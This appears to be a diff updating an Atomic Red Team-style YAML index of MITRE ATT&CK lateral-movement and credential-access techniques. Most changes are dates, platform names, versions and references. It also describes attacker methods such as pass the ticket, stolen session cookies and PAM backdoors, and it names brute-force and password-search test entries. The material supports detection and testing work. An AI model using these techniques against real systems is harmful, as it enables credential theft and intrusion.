@@ -42986,8 +43670,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -43070,12 +43752,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -43102,6 +43783,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -43119,12 +43801,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -43150,14 +43832,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -43275,7 +43956,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -43329,11 +44009,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -43385,14 +44064,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests: []
   T1021.003:
@@ -43478,12 +44156,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -43503,6 +44180,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -43510,7 +44188,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -43526,39 +44203,40 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -43583,12 +44261,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -43602,13 +44279,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -43625,7 +44301,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -43673,7 +44349,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -43706,7 +44382,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1210:
@@ -43745,7 +44420,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -43779,12 +44454,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -43812,10 +44485,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -43845,7 +44517,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -43907,12 +44578,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -43936,11 +44606,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -43965,9 +44634,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -44027,7 +44695,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests: []
   T1550.002:
@@ -44082,7 +44749,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1021.001:
@@ -44150,12 +44816,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -44212,6 +44877,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -44222,13 +44888,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -44287,7 +44952,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -44381,49 +45045,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -44438,20 +45063,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1056.001:
@@ -44531,12 +45193,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -44565,6 +45226,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -44576,18 +45238,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -44614,9 +45276,6 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests:
     - name: Brute Force Credentials of single Azure AD user
@@ -44671,7 +45330,7 @@ credential-access:
           Write-Host "End of bruteforce"
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -44795,12 +45454,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests: []
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -44815,10 +45473,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -44826,14 +45485,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -44876,14 +45535,11 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests: []
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -44938,14 +45594,13 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests: []
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -44996,9 +45651,8 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.005
     atomic_tests:
     - name: Azure - Search Azure AD User Attributes for Passwords
@@ -45050,7 +45704,7 @@ credential-access:
         elevation_required: true
   T1555.002:
     technique:
-      modified: '2024-03-29T16:37:34.772Z'
+      modified: '2024-10-15T16:41:18.638Z'
       name: Securityd Memory
       description: |-
         An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -45084,8 +45738,8 @@ credential-access:
         external_id: T1555.002
       - source_name: External to DA, the OS X Way
         description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
       - source_name: Apple Dev SecurityD
         description: Apple. (n.d.). Security Server and Security Agent. Retrieved
           March 29, 2024.
@@ -45102,11 +45756,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1110.002:
     technique:
